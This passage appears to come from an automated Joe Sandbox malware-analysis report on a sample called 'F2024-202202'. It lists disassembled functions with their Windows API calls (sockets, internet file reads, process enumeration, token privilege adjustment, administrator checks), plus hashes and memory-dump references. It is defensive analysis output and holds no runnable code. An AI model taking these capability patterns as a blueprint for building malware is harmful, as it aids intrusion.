              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ColorProc$LongWindow
              • String ID:
              • API String ID: 3744519093-0
              • Opcode ID: b493f5d85a671c800830456592fd4e7dddb717ba7ba32eafee56966f973f273f
              • Instruction ID: db1515b372f22f00a80d54b8e9e87dc293aad712a7201acae581b066d030d2da
              • Opcode Fuzzy Hash: b493f5d85a671c800830456592fd4e7dddb717ba7ba32eafee56966f973f273f
              • Instruction Fuzzy Hash: 89A125B2119584BAD72CBB28DC88DBB399DDB42345B25021AF402D75D2CB649F039F72
              Function 001F6A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 001F80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001F80CB
              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 001F6AB1
              • WSAGetLastError.WSOCK32(00000000), ref: 001F6ADA
              • bind.WSOCK32(00000000,?,00000010), ref: 001F6B13
              • WSAGetLastError.WSOCK32(00000000), ref: 001F6B20
              • closesocket.WSOCK32(00000000,00000000), ref: 001F6B34
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ErrorLast$bindclosesocketinet_addrsocket
              • String ID:
              • API String ID: 99427753-0
              • Opcode ID: ea7a4fe2123d5a9f3d154db27032e38ae6229059e50fcbb0771b96eb06da46be
              • Instruction ID: deeaf422b392cf279d6ea7fa459b24a54d428bcfff753795dbb381cd4a9b468f
              • Opcode Fuzzy Hash: ea7a4fe2123d5a9f3d154db27032e38ae6229059e50fcbb0771b96eb06da46be
              • Instruction Fuzzy Hash: A541C375B40214AFEB10BF64DC86F7EB7A89B14710F448158FA5AAB3D2DB709E018B91
              Function 002055FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$EnabledForegroundIconicVisibleZoomed
              • String ID:
              • API String ID: 292994002-0
              • Opcode ID: f265affe39c37485f97a0c9f209bb37fcfcc1c83f1caaea0a2accfac9ac270b0
              • Instruction ID: 25ac7e679863e642fd7be9bcc872e351629cc06838e3c414f41af81b9fa4c54a
              • Opcode Fuzzy Hash: f265affe39c37485f97a0c9f209bb37fcfcc1c83f1caaea0a2accfac9ac270b0
              • Instruction Fuzzy Hash: A411C431750B216FE7216F26DC48B2FBB9CEF54721F844429F906D7282CB719911CEA5
              Function 001EC602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
              Download Yara Rule
              APIs
              • CoInitialize.OLE32(00000000), ref: 001EC69D
              • CoCreateInstance.OLE32(00212D6C,00000000,00000001,00212BDC,?), ref: 001EC6B5
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
              • CoUninitialize.OLE32 ref: 001EC922
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CreateInitializeInstanceUninitialize_memmove
              • String ID: .lnk
              • API String ID: 2683427295-24824748
              • Opcode ID: 3e27ccc8c5b50d79c99337fbfb20331731f15789006764ea25820dc96269d89d
              • Instruction ID: 8b6221407c96a62c7ec07c684a4174da0b8121eddd1fa525f06a097be4d497bf
              • Opcode Fuzzy Hash: 3e27ccc8c5b50d79c99337fbfb20331731f15789006764ea25820dc96269d89d
              • Instruction Fuzzy Hash: 48A10971108205AFD304EF64C8C1EABB7E8EFA4708F044959B55697192DB71EA49CB92
              Function 001FC304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
              Download Yara Rule
              APIs
              • LoadLibraryA.KERNEL32(kernel32.dll,?,001C1D88,?), ref: 001FC312
              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 001FC324
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: GetSystemWow64DirectoryW$kernel32.dll
              • API String ID: 2574300362-1816364905
              • Opcode ID: 95bb9c4b9753eb4d13cfa77977deaf425dbbe6f956183ec32466348c0d355160
              • Instruction ID: a5d434557bac247457ee08a2b3648911fb2baa1401a425bad9ec8bb5dad4e616
              • Opcode Fuzzy Hash: 95bb9c4b9753eb4d13cfa77977deaf425dbbe6f956183ec32466348c0d355160
              • Instruction Fuzzy Hash: B3E08C7425030BCFCB344F25DA08A96B6D4FB09384B808439E989D2A50E770D840CAA0
              Function 00193190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __itow__swprintf
              • String ID:
              • API String ID: 674341424-0
              • Opcode ID: 193adebe0abeb0f89049904fe81172b32a9f3534cf7eaaa1734092c62ab38bfd
              • Instruction ID: a0dee7a7b64d0095713891a87282a8306cd8c260f844960557a903664829de42
              • Opcode Fuzzy Hash: 193adebe0abeb0f89049904fe81172b32a9f3534cf7eaaa1734092c62ab38bfd
              • Instruction Fuzzy Hash: BA22AB716083019FDB24EF24C881B6FB7E5BFA8704F15491DF89A97291DB70EA04CB92
              Function 001FF121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
              Download Yara Rule
              APIs
              • CreateToolhelp32Snapshot.KERNEL32 ref: 001FF151
              • Process32FirstW.KERNEL32(00000000,?), ref: 001FF15F
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
              • Process32NextW.KERNEL32(00000000,?), ref: 001FF21F
              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 001FF22E
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
              • String ID:
              • API String ID: 2576544623-0
              • Opcode ID: 225e3e4d6c0994fa9ecd725b2808372404ed5d1fda323698de5e6f42eaee9641
              • Instruction ID: 7f3fdd93687b05bca78c6c20cca71cbd8994074c1eb2a42d0170299611cf6530
              • Opcode Fuzzy Hash: 225e3e4d6c0994fa9ecd725b2808372404ed5d1fda323698de5e6f42eaee9641
              • Instruction Fuzzy Hash: 9F517D715083019FD314EF20DC85A6BB7E8EFA4710F54482DF596972A1EB70EA09CB92
              Function 001DEB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
              Download Yara Rule
              APIs
              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 001DEB19
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: lstrlen
              • String ID: ($|
              • API String ID: 1659193697-1631851259
              • Opcode ID: 0fac397bb3d033e3d8706a92e8a123c47bba2a94355adfc3966a3396e5db3ebf
              • Instruction ID: ece3a84f26df5c245cc9a62fb1ae8f77361f3d27372d1c331341285fa07f9162
              • Opcode Fuzzy Hash: 0fac397bb3d033e3d8706a92e8a123c47bba2a94355adfc3966a3396e5db3ebf
              • Instruction Fuzzy Hash: F1322675A047059FDB28DF19C481A6AB7F1FF48320B15C56EE89ADB3A1E770E981CB40
              Function 001F25E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
              Download Yara Rule
              APIs
              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 001F26D5
              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 001F270C
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Internet$AvailableDataFileQueryRead
              • String ID:
              • API String ID: 599397726-0
              • Opcode ID: 3d3a05be0f8e27d466de40fb4013d0531707e68f317972a398b09788295a7016
              • Instruction ID: 7c9e85a7a259e5f432dd57487dbc9d029400678e85e9a932c41096eb7ad48c27
              • Opcode Fuzzy Hash: 3d3a05be0f8e27d466de40fb4013d0531707e68f317972a398b09788295a7016
              • Instruction Fuzzy Hash: 1741F57560030DBFEB20EE94DC85EBBB7BCEB50724F10406AFB05E6141EBB19E419665
              Function 001EB59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
              Download Yara Rule
              APIs
              • SetErrorMode.KERNEL32(00000001), ref: 001EB5AE
              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 001EB608
              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 001EB655
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ErrorMode$DiskFreeSpace
              • String ID:
              • API String ID: 1682464887-0
              • Opcode ID: 959026456758ebb38885a3966b36b7478e8351ec01100a3ca6515001be6e1eaf
              • Instruction ID: e9fdd673d5612c3c0c42b4a268c31e280b536a115ec5aa9b9a69aba4b084d046
              • Opcode Fuzzy Hash: 959026456758ebb38885a3966b36b7478e8351ec01100a3ca6515001be6e1eaf
              • Instruction Fuzzy Hash: D8216035A00618EFCB00EFA5D8C4AAEBBB8FF58310F1480A9E905AB351DB31A915CF51
              Function 001D8CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 001A0FF6: std::exception::exception.LIBCMT ref: 001A102C
                • Part of subcall function 001A0FF6: __CxxThrowException@8.LIBCMT ref: 001A1041
              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001D8D0D
              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001D8D3A
              • GetLastError.KERNEL32 ref: 001D8D47
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
              • String ID:
              • API String ID: 1922334811-0
              • Opcode ID: 61a2823f3bcca83f8668085f25675c5e6795a95f1d8196fb501d6b15ae06172f
              • Instruction ID: 6ca6580ce1c53b5083427a8c02bc5654f074f0ca1913512b31256c327ae473ad
              • Opcode Fuzzy Hash: 61a2823f3bcca83f8668085f25675c5e6795a95f1d8196fb501d6b15ae06172f
              • Instruction Fuzzy Hash: BF1191B1414309AFE728DF54EDC5D6BB7BDFB44720B20852EF45693641EB70BC408A60
              Function 001E4021 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001E404B
              • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 001E4088
              • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001E4091
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CloseControlCreateDeviceFileHandle
              • String ID:
              • API String ID: 33631002-0
              • Opcode ID: 4631094c2b79619c858575c311cdd5949c5fa70c2fce3165790d20aa93b6a1ba
              • Instruction ID: 840b9766e285da5a0a60c3481da832f73af0ac7f29f6720425ed29efe92600f0
              • Opcode Fuzzy Hash: 4631094c2b79619c858575c311cdd5949c5fa70c2fce3165790d20aa93b6a1ba
              • Instruction Fuzzy Hash: 371130B1944228BFE7209BE9DC48FAFBBBCEB09750F100666BA04E7191D374594587A1
              Function 001E4C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
              Download Yara Rule
              APIs
              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001E4C2C
              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 001E4C43
              • FreeSid.ADVAPI32(?), ref: 001E4C53
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AllocateCheckFreeInitializeMembershipToken
              • String ID:
              • API String ID: 3429775523-0
              • Opcode ID: 6b9f4cbd96f04e286526d0469632be517f560dee103d0e6c80603607b7b8dd0f
              • Instruction ID: aa569a1626b68a78b56243e2ff26a0201ea8ba1b04467d0bdc6cdd3c65a9a2a8
              • Opcode Fuzzy Hash: 6b9f4cbd96f04e286526d0469632be517f560dee103d0e6c80603607b7b8dd0f
              • Instruction Fuzzy Hash: 6EF04975A5130CBFDF04DFF0ED89AAEBBBDEF08201F1044A9A901E2582E7746A048B50
              Function 001E8B13 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
              Download Yara Rule
              APIs
              • __time64.LIBCMT ref: 001E8B25
                • Part of subcall function 001A543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,001E91F8,00000000,?,?,?,?,001E93A9,00000000,?), ref: 001A5443
                • Part of subcall function 001A543A: __aulldiv.LIBCMT ref: 001A5463
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Time$FileSystem__aulldiv__time64
              • String ID: 0u$
              • API String ID: 2893107130-3043055072
              • Opcode ID: 0d2b0b510aef87087f307203b2f3cea72e06e3ec44122969373d7a9608136027
              • Instruction ID: 29086e4d8a4724ff94221cd9e1c15044b3d9266c1e847b11f1b1ffedf96a3d15
              • Opcode Fuzzy Hash: 0d2b0b510aef87087f307203b2f3cea72e06e3ec44122969373d7a9608136027
              • Instruction Fuzzy Hash: 7C21E4766356108FC329CF29D441A52B3E1EBA5321B288E6CD4F9CF2D0CB74B905CB94
              Function 0018E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 17bce39cbdcc5b19347d1884f08bcf9f617cf3c1f1c6205439ea976d761828c4
              • Instruction ID: 5620dc1a592fcaa67f3bc23db6d466b159e05dd88b33b081244c5a9acf63e4ff
              • Opcode Fuzzy Hash: 17bce39cbdcc5b19347d1884f08bcf9f617cf3c1f1c6205439ea976d761828c4
              • Instruction Fuzzy Hash: 7C229B74A00216DFDB28EF54C484AAEBBF1FF19300F148469E856AB351E774AE81CF91
              Function 001EC93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
              Download Yara Rule
              APIs
              • FindFirstFileW.KERNEL32(?,?), ref: 001EC966
              • FindClose.KERNEL32(00000000), ref: 001EC996
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Find$CloseFileFirst
              • String ID:
              • API String ID: 2295610775-0
              • Opcode ID: bfecff1cb7a785ea9eb8f6a64ca4b48965a14fbeadbc76c3a8a59e1d649d7306
              • Instruction ID: 6d7a96720c21d07abad8b09fe48398a4745e324bfd8b6c2399a78d54ab2fd6db
              • Opcode Fuzzy Hash: bfecff1cb7a785ea9eb8f6a64ca4b48965a14fbeadbc76c3a8a59e1d649d7306
              • Instruction Fuzzy Hash: 08115E726106109FD714EF29D849A2AF7E9EF94324F04855EF9AAD7291DB30AD01CB81
              Function 001EA2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
              Download Yara Rule
              APIs
              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,001F977D,?,0020FB84,?), ref: 001EA302
              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,001F977D,?,0020FB84,?), ref: 001EA314
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ErrorFormatLastMessage
              • String ID:
              • API String ID: 3479602957-0
              • Opcode ID: d4e34e310adec9cfc66d44d7696eb4d4616144cca925fb87ee979357ac69e106
              • Instruction ID: b33804957bf129c0a9c959f9ebb6521b7ab1f030ea4b13fc85acfa893e318b67
              • Opcode Fuzzy Hash: d4e34e310adec9cfc66d44d7696eb4d4616144cca925fb87ee979357ac69e106
              • Instruction Fuzzy Hash: 47F0823558532DBBDB20AFA4DC88FEA776DBF08761F004166F918D6181D730A940CBA1
              Function 001D8713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
              Download Yara Rule
              APIs
              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001D8851), ref: 001D8728
              • CloseHandle.KERNEL32(?,?,001D8851), ref: 001D873A
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AdjustCloseHandlePrivilegesToken
              • String ID:
              • API String ID: 81990902-0
              • Opcode ID: 1f83b885dce90baadd485b502203a966d7e7ea5f4b4539ca047ff112e5d28064
              • Instruction ID: f2cd9cc2645513b3fb4ef95fe5d23055346933e3a031f499e85ccd1884ec52f2
              • Opcode Fuzzy Hash: 1f83b885dce90baadd485b502203a966d7e7ea5f4b4539ca047ff112e5d28064
              • Instruction Fuzzy Hash: 77E0B676014650EEE7752B60FE09D777BA9EB047A0B258829B4A680871DB62AC90DB10
              Function 001AA395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,001A8F97,?,?,?,00000001), ref: 001AA39A
              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 001AA3A3
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
